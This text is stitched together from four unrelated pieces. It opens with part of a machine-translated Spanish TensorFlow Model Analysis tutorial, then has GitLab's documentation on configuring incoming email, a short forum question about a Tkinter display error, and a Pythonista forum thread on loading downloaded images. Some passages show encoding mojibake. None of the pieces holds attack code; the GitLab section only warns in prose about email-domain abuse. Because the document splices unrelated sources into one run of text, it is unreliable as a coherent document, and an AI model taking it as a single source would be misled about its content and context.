Instructions for updating: Use eager execution and: `tf.data.TFRecordDataset(path)`
Estimador
import tensorflow_model_analysis as tfma
# Setup tfma.EvalConfig settings
estimator_eval_config = text_format.Parse("""
## Model information
model_specs {
# To use EvalSavedModel set `signature_name` to "eval".
signature_name: "eval"
}
## Post training metric information. These will be merged with any built-in
## metrics from training.
metrics_specs {
metrics { class_name: "ConfusionMatrixPlot" }
# ... add additional metrics and plots ...
}
## Slicing information
slicing_specs {} # overall slice
slicing_specs {
feature_keys: ["trip_start_hour"]
}
slicing_specs {
feature_keys: ["trip_start_day"]
}
slicing_specs {
feature_values: {
key: "trip_start_month"
value: "1"
}
}
slicing_specs {
feature_keys: ["trip_start_hour", "trip_start_day"]
}
""", tfma.EvalConfig())
# Create a tfma.EvalSharedModel that points at our eval saved model.
estimator_base_model_path = os.path.join(
MODELS_DIR, 'estimator', 'eval_model_dir')
estimator_model_path = os.path.join(
estimator_base_model_path, os.listdir(estimator_base_model_path)[0])
estimator_eval_shared_model = tfma.default_eval_shared_model(
eval_saved_model_path=estimator_model_path,
eval_config=estimator_eval_config)
estimator_output_path = os.path.join(OUTPUT_DIR, 'estimator')
# Run TFMA
estimator_eval_result = tfma.run_model_analysis(
eval_shared_model=estimator_eval_shared_model,
eval_config=estimator_eval_config,
data_location=tfrecord_file,
output_path=estimator_output_path)
WARNING:absl:Tensorflow version (2.3.1) found. Note that TFMA support for TF 2.0 is currently in beta Warning:tensorflow:From /tmpfs/src/tf_docs_env/lib/python3.6/site-packages/tensorflow_model_analysis/eval_saved_model/load.py:169: load (from tensorflow.python.saved_model.loader_impl) is deprecated and will be removed in a future version. Instructions for updating: This function will only be available through the v1 compatibility library as tf.compat.v1.saved_model.loader.load or tf.compat.v1.saved_model.load. There will be a new function for importing SavedModels in Tensorflow 2.0. Warning:tensorflow:From /tmpfs/src/tf_docs_env/lib/python3.6/site-packages/tensorflow_model_analysis/eval_saved_model/load.py:169: load (from tensorflow.python.saved_model.loader_impl) is deprecated and will be removed in a future version. Instructions for updating: This function will only be available through the v1 compatibility library as tf.compat.v1.saved_model.loader.load or tf.compat.v1.saved_model.load. There will be a new function for importing SavedModels in Tensorflow 2.0. INFO:tensorflow:Restoring parameters from /tmp/tmpj6t03cp6/saved_models-2.2/models/estimator/eval_model_dir/1591221811/variables/variables INFO:tensorflow:Restoring parameters from /tmp/tmpj6t03cp6/saved_models-2.2/models/estimator/eval_model_dir/1591221811/variables/variables Warning:tensorflow:From /tmpfs/src/tf_docs_env/lib/python3.6/site-packages/tensorflow_model_analysis/eval_saved_model/graph_ref.py:189: get_tensor_from_tensor_info (from tensorflow.python.saved_model.utils_impl) is deprecated and will be removed in a future version. Instructions for updating: This function will only be available through the v1 compatibility library as tf.compat.v1.saved_model.utils.get_tensor_from_tensor_info or tf.compat.v1.saved_model.get_tensor_from_tensor_info. Warning:tensorflow:From /tmpfs/src/tf_docs_env/lib/python3.6/site-packages/tensorflow_model_analysis/eval_saved_model/graph_ref.py:189: get_tensor_from_tensor_info (from tensorflow.python.saved_model.utils_impl) is deprecated and will be removed in a future version. Instructions for updating: This function will only be available through the v1 compatibility library as tf.compat.v1.saved_model.utils.get_tensor_from_tensor_info or tf.compat.v1.saved_model.get_tensor_from_tensor_info.
Visualización de métricas y gráficos
Ahora que hemos realizado la evaluación, echemos un vistazo a nuestras visualizaciones usando TFMA. Para los siguientes ejemplos, visualizaremos los resultados de ejecutar la evaluación en el modelo keras. Para ver el modelo basado en estimador, actualice eval_result para que apunte a nuestra variable estimator_eval_result .
eval_result = keras_eval_result
# eval_result = estimator_eval_result
Métricas de renderizado
Para ver las métricas, usa tfma.view.render_slicing_metrics
De forma predeterminada, las vistas mostrarán el sector Overall . Para ver un corte en particular, puede usar el nombre de la columna (configurando slicing_column ) o proporcionar un tfma.SlicingSpec .
La visualización de métricas admite las siguientes interacciones:
Haga clic y arrastre para desplazarse
Desplácese para hacer zoom
Haga clic derecho para restablecer la vista
Desplácese sobre el punto de datos deseado para ver más detalles.
Seleccione entre cuatro tipos diferentes de vistas usando las selecciones en la parte inferior.
Por ejemplo, configuraremos slicing_column para ver la característica trip_start_hour de nuestras anteriores slicing_specs .
tfma.view.render_slicing_metrics(eval_result, slicing_column='trip_start_hour')
SlicingMetricsViewer(config={'weightedExamplesColumn': 'example_count'}, data=[{'slice': 'trip_start_hour:2', …
Resumen de rebanadas
La visualización predeterminada es Vista general de sectores cuando el número de sectores es pequeño. Muestra los valores de las métricas para cada segmento. Como hemos seleccionado trip_start_hour arriba, nos muestra métricas como la precisión y el AUC para cada hora, lo que nos permite buscar problemas que son específicos de algunas horas y no de otras.
En la visualización de arriba:
Intente ordenar la columna de funciones, que es nuestra función trip_start_hours, haciendo clic en el encabezado de la columna
Intente ordenar por precisión y observe que la precisión para algunas de las horas con ejemplos es 0, lo que puede indicar un problema
El gráfico también nos permite seleccionar y mostrar diferentes métricas en nuestros segmentos.
Prueba a seleccionar diferentes métricas en el menú "Mostrar".
Intente seleccionar la recuperación en el menú "Mostrar" y observe que la recuperación de algunas de las horas con ejemplos es 0, lo que puede indicar un problema.
También es posible establecer un umbral para filtrar porciones con un número menor de ejemplos o "pesos". Puede escribir un número mínimo de ejemplos o utilizar el control deslizante.
Histograma de métricas
Esta vista también admite un histograma de métricas como visualización alternativa, que también es la vista predeterminada cuando el número de sectores es grande. Los resultados se dividirán en cubos y se podrá visualizar el número de cortes / pesos totales / ambos. Las columnas se pueden ordenar haciendo clic en el encabezado de la columna. Las rebanadas con pesos pequeños se pueden filtrar estableciendo el umbral. Se puede aplicar más filtrado arrastrando la banda gris. Para restablecer el rango, haga doble clic en la banda. El filtrado también se puede utilizar para eliminar valores atípicos en la visualización y las tablas de métricas. Haga clic en el icono de engranaje para cambiar a una escala logarítmica en lugar de una escala lineal.
Prueba a seleccionar "Histograma de métricas" en el menú de visualización.
Más rebanadas
Nuestro tfma.EvalConfig inicial creó una lista completa de slicing_specs , que podemos visualizar actualizando la información de corte pasada a tfma.view.render_slicing_metrics . Aquí seleccionaremos el segmento trip_start_day (días de la semana). Intente cambiar trip_start_day a trip_start_month y trip_start_month nuevamente para examinar diferentes cortes.
tfma.view.render_slicing_metrics(eval_result, slicing_column='trip_start_day')
SlicingMetricsViewer(config={'weightedExamplesColumn': 'example_count'}, data=[{'slice': 'trip_start_day:3', '…
TFMA también admite la creación de cruces de características para analizar combinaciones de características. Nuestra configuración original creó una trip_start_hour y trip_start_day :
tfma.view.render_slicing_metrics(
eval_result,
slicing_spec=tfma.SlicingSpec(
feature_keys=['trip_start_hour', 'trip_start_day']))
SlicingMetricsViewer(config={'weightedExamplesColumn': 'example_count'}, data=[{'slice': 'trip_start_day_X_tri…
¡Cruzar las dos columnas crea muchas combinaciones! Reduzcamos nuestra cruz para ver solo los viajes que comienzan al mediodía . Luego, seleccionemos binary_accuracy de la visualización:
tfma.view.render_slicing_metrics(
eval_result,
slicing_spec=tfma.SlicingSpec(
feature_keys=['trip_start_day'], feature_values={'trip_start_hour': '12'}))
SlicingMetricsViewer(config={'weightedExamplesColumn': 'example_count'}, data=[{'slice': 'trip_start_day_X_tri…
Representación de gráficos
Al igual que con las métricas, los gráficos se pueden ver por sector. A diferencia de las métricas, solo se pueden mostrar los gráficos de un valor de sector en particular, por lo que se debe usar tfma.SlicingSpec y debe especificar tanto el nombre como el valor de la característica del sector. Si no se proporciona ningún sector, se utilizan los gráficos del sector Overall .
En el siguiente ejemplo, mostramos las gráficas CalibrationPlot y ConfusionMatrixPlot que se calcularon para trip_start_hour:1 segmento.
tfma.view.render_plot(
eval_result,
tfma.SlicingSpec(feature_values={'trip_start_hour': '1'}))
PlotViewer(config={'sliceName': 'trip_start_hour:1', 'metricKeys': {'calibrationPlot': {'metricName': 'calibra…
Seguimiento del rendimiento del modelo a lo largo del tiempo
Su conjunto de datos de entrenamiento se utilizará para entrenar su modelo y, con suerte, será representativo de su conjunto de datos de prueba y los datos que se enviarán a su modelo en producción. Sin embargo, si bien los datos en las solicitudes de inferencia pueden seguir siendo los mismos que sus datos de entrenamiento, en muchos casos comenzarán a cambiar lo suficiente como para que el rendimiento de su modelo cambie.
Eso significa que necesita monitorear y medir el desempeño de su modelo de manera continua, para que pueda estar al tanto de los cambios y reaccionar ante ellos. Echemos un vistazo a cómo puede ayudar TFMA.
Carguemos 3 ejecuciones de modelos diferentes y usemos TFMA para ver cómo se comparan usando render_time_series .
# Note this re-uses the EvalConfig from the keras setup.
# Run eval on each saved model
output_paths = []
for i in range(3):
# Create a tfma.EvalSharedModel that points at our saved model.
eval_shared_model = tfma.default_eval_shared_model(
eval_saved_model_path=os.path.join(MODELS_DIR, 'keras', str(i)),
eval_config=keras_eval_config)
output_path = os.path.join(OUTPUT_DIR, 'time_series', str(i))
output_paths.append(output_path)
# Run TFMA
tfma.run_model_analysis(eval_shared_model=eval_shared_model,
eval_config=keras_eval_config,
data_location=tfrecord_file,
output_path=output_path)
WARNING:absl:Tensorflow version (2.3.1) found. Note that TFMA support for TF 2.0 is currently in beta WARNING:absl:Tensorflow version (2.3.1) found. Note that TFMA support for TF 2.0 is currently in beta WARNING:absl:Tensorflow version (2.3.1) found. Note that TFMA support for TF 2.0 is currently in beta
Primero, imaginaremos que hemos entrenado e implementado nuestro modelo ayer, y ahora queremos ver cómo le está yendo con los nuevos datos que ingresan hoy. La visualización comenzará mostrando AUC. Desde la interfaz de usuario puede:
Agregue otras métricas mediante el menú "Agregar serie de métricas".
Cierre los gráficos no deseados haciendo clic en x
Desplácese sobre los puntos de datos (los extremos de los segmentos de línea en el gráfico) para obtener más detalles
eval_results_from_disk = tfma.load_eval_results(output_paths[:2])
tfma.view.render_time_series(eval_results_from_disk)
TimeSeriesViewer(config={'isModelCentric': True}, data=[{'metrics': {'': {'': {'calibration': {'doubleValue': …
Ahora imaginaremos que ha pasado otro día y queremos ver cómo les va con los nuevos datos que llegan hoy, en comparación con los dos días anteriores:
eval_results_from_disk = tfma.load_eval_results(output_paths)
tfma.view.render_time_series(eval_results_from_disk)
TimeSeriesViewer(config={'isModelCentric': True}, data=[{'metrics': {'': {'': {'calibration': {'doubleValue': …
Modelo de validación
TFMA se puede configurar para evaluar varios modelos al mismo tiempo. Por lo general, esto se hace para comparar un nuevo modelo con una línea de base (como el modelo de servicio actual) para determinar cuáles son las diferencias de rendimiento en las métricas (por ejemplo, AUC, etc.) en relación con la línea de base. Cuando se configuran los umbrales , TFMA producirá un registro tfma.ValidationResult indica si el rendimiento coincide con las expectativas.
Reconfiguremos nuestra evaluación de keras para comparar dos modelos: un candidato y una línea de base. También tmfa.MetricThreshold el desempeño del candidato contra la línea de base estableciendo un tmfa.MetricThreshold en la métrica AUC.
# Setup tfma.EvalConfig setting
eval_config_with_thresholds = text_format.Parse("""
## Model information
model_specs {
name: "candidate"
# For keras we need to add a `label_key`.
label_key: "big_tipper"
}
model_specs {
name: "baseline"
# For keras we need to add a `label_key`.
label_key: "big_tipper"
is_baseline: true
}
## Post training metric information
metrics_specs {
metrics { class_name: "ExampleCount" }
metrics { class_name: "BinaryAccuracy" }
metrics { class_name: "BinaryCrossentropy" }
metrics {
class_name: "AUC"
threshold {
# Ensure that AUC is always > 0.9
value_threshold {
lower_bound { value: 0.9 }
}
# Ensure that AUC does not drop by more than a small epsilon
# e.g. (candidate - baseline) > -1e-10 or candidate > baseline - 1e-10
change_threshold {
direction: HIGHER_IS_BETTER
absolute { value: -1e-10 }
}
}
}
metrics { class_name: "AUCPrecisionRecall" }
metrics { class_name: "Precision" }
metrics { class_name: "Recall" }
metrics { class_name: "MeanLabel" }
metrics { class_name: "MeanPrediction" }
metrics { class_name: "Calibration" }
metrics { class_name: "CalibrationPlot" }
metrics { class_name: "ConfusionMatrixPlot" }
# ... add additional metrics and plots ...
}
## Slicing information
slicing_specs {} # overall slice
slicing_specs {
feature_keys: ["trip_start_hour"]
}
slicing_specs {
feature_keys: ["trip_start_day"]
}
slicing_specs {
feature_keys: ["trip_start_month"]
}
slicing_specs {
feature_keys: ["trip_start_hour", "trip_start_day"]
}
""", tfma.EvalConfig())
# Create tfma.EvalSharedModels that point at our keras models.
candidate_model_path = os.path.join(MODELS_DIR, 'keras', '2')
baseline_model_path = os.path.join(MODELS_DIR, 'keras', '1')
eval_shared_models = [
tfma.default_eval_shared_model(
model_name=tfma.CANDIDATE_KEY,
eval_saved_model_path=candidate_model_path,
eval_config=eval_config_with_thresholds),
tfma.default_eval_shared_model(
model_name=tfma.BASELINE_KEY,
eval_saved_model_path=baseline_model_path,
eval_config=eval_config_with_thresholds),
]
validation_output_path = os.path.join(OUTPUT_DIR, 'validation')
# Run TFMA
eval_result_with_validation = tfma.run_model_analysis(
eval_shared_models,
eval_config=eval_config_with_thresholds,
data_location=tfrecord_file,
output_path=validation_output_path)
WARNING:absl:Tensorflow version (2.3.1) found. Note that TFMA support for TF 2.0 is currently in beta /tmpfs/src/tf_docs_env/lib/python3.6/site-packages/tensorflow_model_analysis/evaluators/metrics_validator.py:66: RuntimeWarning: invalid value encountered in true_divide ratio = diff / metrics[key.make_baseline_key(baseline_model_name)]
Cuando se ejecutan evaluaciones con uno o más modelos contra una línea de base, TFMA agrega automáticamente métricas de diferencia para todas las métricas calculadas durante la evaluación. Estas métricas llevan el nombre de la métrica correspondiente, pero con _diff añadido al nombre de la métrica.
Echemos un vistazo a las métricas producidas por nuestra carrera:
tfma.view.render_time_series(eval_result_with_validation)
TimeSeriesViewer(config={'isModelCentric': True}, data=[{'metrics': {'': {'': {'calibration_diff': {'doubleVal…
Ahora veamos el resultado de nuestras comprobaciones de validación. Para ver los resultados de la validación usamostfma.load_validator_result . Para nuestro ejemplo, la validación falla porque AUC está por debajo del umbral.
validation_result = tfma.load_validation_result(validation_output_path)
print(validation_result.validation_ok)
False
|
Requirements
Set it up
GitLab has several features based on receiving incoming emails:
Reply by Email: allow GitLab users to comment on issues and merge requests by replying to notification emails.
New issue by email: allow GitLab users to create a new issue by sending an email to a user-specific email address.
New merge request by email: allow GitLab users to create a new merge request by sending an email to a user-specific email address.
Service Desk: provide e-mail support to your customers through GitLab.
Note:It is
notrecommended to use an email address that receives or will receive any messages not intended for the GitLab instance. Any incoming emails not intended for GitLab will receive a reject notice.
Handling incoming emails requires an IMAP-enabled email account. GitLab requires one of the following three strategies:
Email sub-addressing (recommended)
Catch-all mailbox
Dedicated email address (supports Reply by Email only)
Let’s walk through each of these options.
Sub-addressing isa mail server feature where any email to user+arbitrary_tag@example.com will end upin the mailbox for user@example.com . It is supported by providers such asGmail, Google Apps, Yahoo! Mail, Outlook.com, and iCloud, as well as thePostfix mail server, which you can run on-premises.Microsoft Exchange Server does not support sub-addressing,and Microsoft Office 365 does not support sub-addressing by default
Tip:If your provider or server supports email sub-addressing, we recommend using it. A dedicated email address only supports Reply by Email functionality. A catch-all mailbox supports the same features as sub-addressing as of GitLab 11.7, but sub-addressing is still preferred because only one email address is used, leaving a catch-all available for other purposes beyond GitLab.
A catch-all mailbox for a domain receives all emails addressed to the domain that do not match any addresses that exist on the mail server.
As of GitLab 11.7, catch-all mailboxes support the same features as email sub-addressing, but email sub-addressing remains our recommendation so that you can reserve your catch-all mailbox for other purposes.
This solution is relatively simple to set up: you just need to create an email address dedicated to receive your users’ replies to GitLab notifications. However, this method only supports replies, and not the other features of incoming email.
If you want to use Gmail / Google Apps for incoming emails, make sure you have IMAP access enabled and allowed less secure apps to access the account or turn-on 2-step validation and use an application password.
If you want to use Office 365, and two-factor authentication is enabled, make sure you’re using an app password instead of the regular password for the mailbox.
To set up a basic Postfix mail server with IMAP access on Ubuntu, follow the Postfix setup documentation.
Caution:Be careful when choosing the domain used for receiving incoming email.
For example, suppose your top-level company domain is hooli.com.All employees in your company have an email address at that domain via GoogleApps, and your company’s private Slack instance requires a valid @hooli.comemail address to sign up.
If you also host a public-facing GitLab instance at hooli.com and set yourincoming email domain to hooli.com, an attacker could abuse the “Create newissue by email” or“Create new merge request by email”features by using a project’s unique address as the email when signing up forSlack. This would send a confirmation email, which would create a new issue ormerge request on the project owned by the attacker, allowing them to click theconfirmation link and validate their account on your company’s private Slackinstance.
We recommend receiving incoming email on a subdomain, such asincoming.hooli.com, and ensuring that you do not employ any services thatauthenticate solely based on access to an email domain such as *.hooli.com.Alternatively, use a dedicated domain for GitLab email communications such ashooli-gitlab.com.
See GitLab issue #30366 for a real-world example of this exploit.
Caution:Use a mail server that has been configured to reduce spam. A Postfix mail server that is running on a default configuration, for example, can result in abuse. All messages received on the configured mailbox will be processed and messages that are not intended for the GitLab instance will receive a reject notice. If the sender’s address is spoofed, the reject notice will be delivered to the spoofed
FROM address, which can cause the mail server’s IP or domain to appear on a blocklist.
Find the
incoming_emailsection in/etc/gitlab/gitlab.rb, enable the feature and fill in the details for your specific IMAP server and email account (see examples below).
Reconfigure GitLab for the changes to take effect:
sudo gitlab-ctl reconfigure
sudo gitlab-ctl restart
Verify that everything is configured correctly:
sudo gitlab-rake gitlab:incoming_email:check
Reply by email should now be working.
Go to the GitLab installation directory:
cd /home/git/gitlab
Find the
incoming_emailsection inconfig/gitlab.yml, enable the feature and fill in the details for your specific IMAP server and email account (see examples below).
Enable
mail_roomin the init script at/etc/default/gitlab:
sudo mkdir -p /etc/default
echo 'mail_room_enabled=true' | sudo tee -a /etc/default/gitlab
Restart GitLab:
sudo service gitlab restart
Verify that everything is configured correctly:
sudo -u git -H bundle exec rake gitlab:incoming_email:check RAILS_ENV=production
Reply by email should now be working.
Example configuration for Postfix mail server. Assumes mailbox incoming@gitlab.example.com.
Example for Omnibus installs:
gitlab_rails['incoming_email_enabled'] = true # The email address including the `%{key}` placeholder that will be replaced to reference the item being replied to. # The placeholder can be omitted but if present, it must appear in the "user" part of the address (before the `@`). gitlab_rails['incoming_email_address'] = "incoming+%{key}@gitlab.example.com" # Email account username # With third party providers, this is usually the full email address. # With self-hosted email servers, this is usually the user part of the email address. gitlab_rails['incoming_email_email'] = "incoming" # Email account password gitlab_rails['incoming_email_password'] = "[REDACTED]" # IMAP server host gitlab_rails['incoming_email_host'] = "gitlab.example.com" # IMAP server port gitlab_rails['incoming_email_port'] = 143 # Whether the IMAP server uses SSL gitlab_rails['incoming_email_ssl'] = false # Whether the IMAP server uses StartTLS gitlab_rails['incoming_email_start_tls'] = false # The mailbox where incoming mail will end up. Usually "inbox". gitlab_rails['incoming_email_mailbox_name'] = "inbox" # The IDLE command timeout. gitlab_rails['incoming_email_idle_timeout'] = 60 # Whether to expunge (permanently remove) messages from the mailbox when they are deleted after delivery gitlab_rails['incoming_email_expunge_deleted'] = true
Example for source installs:
incoming_email: enabled: true # The email address including the `%{key}` placeholder that will be replaced to reference the item being replied to. # The placeholder can be omitted but if present, it must appear in the "user" part of the address (before the `@`). address: "incoming+%{key}@gitlab.example.com" # Email account username # With third party providers, this is usually the full email address. # With self-hosted email servers, this is usually the user part of the email address. user: "incoming" # Email account password password: "[REDACTED]" # IMAP server host host: "gitlab.example.com" # IMAP server port port: 143 # Whether the IMAP server uses SSL ssl: false # Whether the IMAP server uses StartTLS start_tls: false # The mailbox where incoming mail will end up. Usually "inbox". mailbox: "inbox" # The IDLE command timeout. idle_timeout: 60 # Whether to expunge (permanently remove) messages from the mailbox when they are deleted after delivery expunge_deleted: true
Example configuration for Gmail/G Suite. Assumes mailbox gitlab-incoming@gmail.com.
Note:
incoming_email_email cannot be a Gmail alias account.
Example for Omnibus installs:
gitlab_rails['incoming_email_enabled'] = true # The email address including the `%{key}` placeholder that will be replaced to reference the item being replied to. # The placeholder can be omitted but if present, it must appear in the "user" part of the address (before the `@`). gitlab_rails['incoming_email_address'] = "gitlab-incoming+%{key}@gmail.com" # Email account username # With third party providers, this is usually the full email address. # With self-hosted email servers, this is usually the user part of the email address. gitlab_rails['incoming_email_email'] = "gitlab-incoming@gmail.com" # Email account password gitlab_rails['incoming_email_password'] = "[REDACTED]" # IMAP server host gitlab_rails['incoming_email_host'] = "imap.gmail.com" # IMAP server port gitlab_rails['incoming_email_port'] = 993 # Whether the IMAP server uses SSL gitlab_rails['incoming_email_ssl'] = true # Whether the IMAP server uses StartTLS gitlab_rails['incoming_email_start_tls'] = false # The mailbox where incoming mail will end up. Usually "inbox". gitlab_rails['incoming_email_mailbox_name'] = "inbox" # The IDLE command timeout. gitlab_rails['incoming_email_idle_timeout'] = 60 # Whether to expunge (permanently remove) messages from the mailbox when they are deleted after delivery gitlab_rails['incoming_email_expunge_deleted'] = true
Example for source installs:
incoming_email: enabled: true # The email address including the `%{key}` placeholder that will be replaced to reference the item being replied to. # The placeholder can be omitted but if present, it must appear in the "user" part of the address (before the `@`). address: "gitlab-incoming+%{key}@gmail.com" # Email account username # With third party providers, this is usually the full email address. # With self-hosted email servers, this is usually the user part of the email address. user: "gitlab-incoming@gmail.com" # Email account password password: "[REDACTED]" # IMAP server host host: "imap.gmail.com" # IMAP server port port: 993 # Whether the IMAP server uses SSL ssl: true # Whether the IMAP server uses StartTLS start_tls: false # The mailbox where incoming mail will end up. Usually "inbox". mailbox: "inbox" # The IDLE command timeout. idle_timeout: 60 # Whether to expunge (permanently remove) messages from the mailbox when they are deleted after delivery expunge_deleted: true
Example configurations for Microsoft Exchange Server with IMAP enabled. Because Exchange does not support sub-addressing, only two options exist:
Catch-all mailbox (recommended for Exchange-only)
Dedicated email address (supports Reply by Email only)
Assumes the catch-all mailbox incoming@exchange.example.com.
Example for Omnibus installs:
gitlab_rails['incoming_email_enabled'] = true # The email address including the `%{key}` placeholder that will be replaced to reference the item being replied to. # The placeholder can be omitted but if present, it must appear in the "user" part of the address (before the `@`). # Exchange does not support sub-addressing, so a catch-all mailbox must be used. gitlab_rails['incoming_email_address'] = "incoming-%{key}@exchange.example.com" # Email account username # Typically this is the userPrincipalName (UPN) gitlab_rails['incoming_email_email'] = "incoming@ad-domain.example.com" # Email account password gitlab_rails['incoming_email_password'] = "[REDACTED]" # IMAP server host gitlab_rails['incoming_email_host'] = "exchange.example.com" # IMAP server port gitlab_rails['incoming_email_port'] = 993 # Whether the IMAP server uses SSL gitlab_rails['incoming_email_ssl'] = true
Example for source installs:
incoming_email: enabled: true # The email address including the `%{key}` placeholder that will be replaced to reference the item being replied to. # The placeholder can be omitted but if present, it must appear in the "user" part of the address (before the `@`). # Exchange does not support sub-addressing, so a catch-all mailbox must be used. address: "incoming-%{key}@exchange.example.com" # Email account username # Typically this is the userPrincipalName (UPN) user: "incoming@ad-domain.example.com" # Email account password password: "[REDACTED]" # IMAP server host host: "exchange.example.com" # IMAP server port port: 993 # Whether the IMAP server uses SSL ssl: true
Assumes the dedicated email address incoming@exchange.example.com.
Example for Omnibus installs:
gitlab_rails['incoming_email_enabled'] = true # Exchange does not support sub-addressing, and we're not using a catch-all mailbox so %{key} is not used here gitlab_rails['incoming_email_address'] = "incoming@exchange.example.com" # Email account username # Typically this is the userPrincipalName (UPN) gitlab_rails['incoming_email_email'] = "incoming@ad-domain.example.com" # Email account password gitlab_rails['incoming_email_password'] = "[REDACTED]" # IMAP server host gitlab_rails['incoming_email_host'] = "exchange.example.com" # IMAP server port gitlab_rails['incoming_email_port'] = 993 # Whether the IMAP server uses SSL gitlab_rails['incoming_email_ssl'] = true
Example for source installs:
incoming_email: enabled: true # Exchange does not support sub-addressing, # and we're not using a catch-all mailbox so %{key} is not used here address: "incoming@exchange.example.com" # Email account username # Typically this is the userPrincipalName (UPN) user: "incoming@ad-domain.example.com" # Email account password password: "[REDACTED]" # IMAP server host host: "exchange.example.com" # IMAP server port port: 993 # Whether the IMAP server uses SSL ssl: true
Example configurations for Microsoft Office 365 with IMAP enabled.
Note:As of September 2020 sub-addressing support has been added to Office 365. This feature is not enabled by default, and must be enabled through PowerShell.
This series of PowerShell commands enables sub-addressing at the organization level in Office 365. This allows all mailboxes in the organization to receive sub-addressed mail:
Note:This series of commands will enable sub-addressing at the organization level in Office 365. This will allow all mailboxes in the organization to receive sub-addressed mail.
Set-ExecutionPolicy RemoteSigned -Scope CurrentUser $UserCredential = Get-Credential $Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri https://outlook.office365.com/powershell-liveid/ -Credential $UserCredential -Authentication Basic -AllowRedirection Import-PSSession $Session -DisableNameChecking Set-OrganizationConfig -AllowPlusAddressInRecipients $true
This example for Omnibus GitLab assumes the mailbox incoming@office365.example.com:
gitlab_rails['incoming_email_enabled'] = true # The email address including the `%{key}` placeholder that will be replaced # to reference the item being replied to. The placeholder can be omitted, but if # present, it must appear in the "user" part of the address (before the `@`). gitlab_rails['incoming_email_address'] = "incoming+%{key}@office365.example.com" # Email account username # Typically this is the userPrincipalName (UPN) gitlab_rails['incoming_email_email'] = "incoming@office365.example.com" # Email account password gitlab_rails['incoming_email_password'] = "[REDACTED]" # IMAP server host gitlab_rails['incoming_email_host'] = "outlook.office365.com" # IMAP server port gitlab_rails['incoming_email_port'] = 993 # Whether the IMAP server uses SSL gitlab_rails['incoming_email_ssl'] = true
This example for source installs assumes the mailbox incoming@office365.example.com:
incoming_email: enabled: true # The email address including the `%{key}` placeholder that will be replaced # to reference the item being replied to. The placeholder can be omitted, but # if present, it must appear in the "user" part of the address (before the `@`). address: "incoming+%{key}@office365.example.comm" # Email account username # Typically this is the userPrincipalName (UPN) user: "incoming@office365.example.comm" # Email account password password: "[REDACTED]" # IMAP server host host: "outlook.office365.com" # IMAP server port port: 993 # Whether the IMAP server uses SSL ssl: true
This example for Omnibus installs assumes the catch-all mailbox incoming@office365.example.com:
gitlab_rails['incoming_email_enabled'] = true # The email address including the `%{key}` placeholder that will be replaced to # reference the item being replied to. The placeholder can be omitted, but if present, # it must appear in the "user" part of the address (before the `@`). gitlab_rails['incoming_email_address'] = "incoming-%{key}@office365.example.com" # Email account username # Typically this is the userPrincipalName (UPN) gitlab_rails['incoming_email_email'] = "incoming@office365.example.com" # Email account password gitlab_rails['incoming_email_password'] = "[REDACTED]" # IMAP server host gitlab_rails['incoming_email_host'] = "outlook.office365.com" # IMAP server port gitlab_rails['incoming_email_port'] = 993 # Whether the IMAP server uses SSL gitlab_rails['incoming_email_ssl'] = true
This example for source installs assumes the catch-all mailbox incoming@office365.example.com:
incoming_email: enabled: true # The email address including the `%{key}` placeholder that will be replaced # to reference the item being replied to. The placeholder can be omitted, but # if present, it must appear in the "user" part of the address (before the `@`). address: "incoming-%{key}@office365.example.com" # Email account username # Typically this is the userPrincipalName (UPN) user: "incoming@ad-domain.example.com" # Email account password password: "[REDACTED]" # IMAP server host host: "outlook.office365.com" # IMAP server port port: 993 # Whether the IMAP server uses SSL ssl: true
This example for Omnibus installs assumes the dedicated email address incoming@office365.example.com:
gitlab_rails['incoming_email_enabled'] = true gitlab_rails['incoming_email_address'] = "incoming@office365.example.com" # Email account username # Typically this is the userPrincipalName (UPN) gitlab_rails['incoming_email_email'] = "incoming@office365.example.com" # Email account password gitlab_rails['incoming_email_password'] = "[REDACTED]" # IMAP server host gitlab_rails['incoming_email_host'] = "outlook.office365.com" # IMAP server port gitlab_rails['incoming_email_port'] = 993 # Whether the IMAP server uses SSL gitlab_rails['incoming_email_ssl'] = true
This example for source installs assumes the dedicated email address incoming@office365.example.com:
incoming_email: enabled: true address: "incoming@office365.example.com" # Email account username # Typically this is the userPrincipalName (UPN) user: "incoming@office365.example.com" # Email account password password: "[REDACTED]" # IMAP server host host: "outlook.office365.com" # IMAP server port port: 993 # Whether the IMAP server uses SSL ssl: true
|
Hi guys I want to create a basic GUI with TKinter.
This is my code
from tkinter import*
import tkinter.font
win =Tk()
win.title("Test")
myFont = tkinter.font.Font( family = 'Helvetica', size = 12, weight = 'bold')
def ledToggle():
print("Hello World")
button1 = Button(win,text ='Test', font = myFont,command = ledToggle, bg='bisque2$
button1.grid(row=0,column=1)
I get this error message:
Traceback (most recent call last):
File "gui.py", line 4, in <module>
win =Tk()
File "/usr/lib/python3.5/tkinter/__init__.py", line 1880, in __init__
self.tk = _tkinter.create(screenName, baseName, className, interactive, wantobjects, useTk, sync, use)
_tkinter.TclError: no display name and no $DISPLAY environment variable
|
How to load an image into image view?
Been trying to get an idea of mine working. I made a script to download galleries, and Iâm trying to set the image view after the image has been downloaded.
But for some reason what I did below doesnât do anything. Could someone tell me what Iâm doing wrong?
import ui,requests,Image
from io import BytesIO
Image_url =“some image urlâ€
image_data = BytesIO(requests.get(image_url).content)
image = Image.open(image_data)
w,h = ui.get_screen_size()
testview = ui.View()
testview.frame = (0,0,w,h)
Img_view = ui.ImageView()
Img_view.frame() = testview.frame()
testview.add_subview(img_view)
testview.present()
Img_view.image= ui.Image.from_data(image.tobytes())
AceNinjaFire
Nvm I think I figured it out, it has to be a bytes-like object. I just have to figure out how to get image.tobytes() to byte-like and not bytes
stephen
@AceNinjaFire said:
import ui,requests,Image
from io import BytesIO
Image_url =âsome image urlâ
image_data = BytesIO(requests.get(image_url).content)
image = Image.open(image_data)
w,h = ui.get_screen_size()
testview = ui.View()
testview.frame = (0,0,w,h)
Img_view
why not use ui.ImageView.load_from_url(URL)
stephen
@AceNinjaFire
or better yet
import urllib.request, ui
URL = 'https://i.imgur.com/qaAHDac.png'
with urllib.request.urlopen(URL) as url:
with open('temp.jpg', 'wb') as f:
f.write(url.read())
iv=ui.ImageView(image=ui.Image.named('temp.jpg')).present('sheets')
ccc
import io, requests, ui
url = "https://www.python.org/static/community_logos/python-powered-w-200x80.png"
with io.BytesIO(requests.get(url).content) as image_data:
image = ui.Image.from_data(image_data.getvalue())
ui.ImageView(image=image).present()
If you are dealing with lots of images or large images in Pythonista then it is super important to use the
withblock to automate the close of the io.BytesIO and give the garbage collector the opportunity to reclaim the bytes and avoid out-of-memory crashes.ccc
